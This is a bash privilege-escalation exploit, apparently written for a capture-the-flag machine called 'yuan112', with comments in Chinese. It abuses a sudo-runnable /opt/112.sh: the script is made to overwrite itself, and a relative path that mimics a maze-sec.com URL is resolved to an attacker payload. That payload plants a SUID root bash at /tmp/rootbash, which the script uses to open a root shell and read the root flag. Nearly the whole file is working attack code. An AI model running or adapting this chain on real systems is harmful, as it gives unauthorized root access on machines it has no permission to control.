#!/bin/bash # ============================================================ # yuan112 提权利用链:/opt/112.sh 自覆盖 + 相对路径解析 # # 利用原理: # 1. 112.sh 以 root 将固定格式内容写入任意文件 # 2. 用 112.sh 覆盖 /opt/112.sh 自身 # 3. 被覆盖后的 112.sh 成为纯文本文件 # 4. sudo 执行时,kernel 回退到 /bin/sh 解释 # 5. /bin/sh 将内容当作命令执行 # 6. 当前工作目录下的相对路径解析到攻击者准备的 payload # ============================================================ set -e PAYLOAD_DIR="/tmp/ht" PAYLOAD_PATH="${PAYLOAD_DIR}/https:/maze-sec.com" PAYLOAD_FILE="${PAYLOAD_PATH}/pwn" SUID_BASH="/tmp/rootbash" echo "[*] Step 1: 创建目录结构" mkdir -p "${PAYLOAD_PATH}" echo "[*] Step 2: 写入 SUID bash 生成 payload" cat > "${PAYLOAD_FILE}" << 'PAYLOAD' #!/bin/bash cp /bin/bash /tmp/rootbash chown root:root /tmp/rootbash chmod 4755 /tmp/rootbash PAYLOAD chmod +x "${PAYLOAD_FILE}" echo " payload: ${PAYLOAD_FILE}" echo "[*] Step 3: cd 到 ${PAYLOAD_DIR}" cd "${PAYLOAD_DIR}" echo " 当前目录: $(pwd)" echo "[*] Step 4: 用 112.sh 覆盖自身" sudo /opt/112.sh -u https://maze-sec.com/pwn -o /opt/112.sh echo " /opt/112.sh 内容: $(head -1 /opt/112.sh)" echo "[*] Step 5: 再次 sudo 执行已被覆盖的 112.sh" echo " shell 将内容 'https://maze-sec.com/pwn is ...' 当作命令" echo " 相对路径解析为: ./https:/maze-sec.com/pwn → ${PAYLOAD_FILE}" sudo /opt/112.sh if [ -x "${SUID_BASH}" ]; then echo "" echo "[+] SUID bash 已创建: ${SUID_BASH}" echo "" echo "=== Root Shell ===" ${SUID_BASH} -p -c 'id; echo; echo "=== Root Flag ==="; cat /root/root.txt 2>/dev/null || echo "未找到 root flag"' else echo "[-] SUID bash 创建失败" exit 1 fi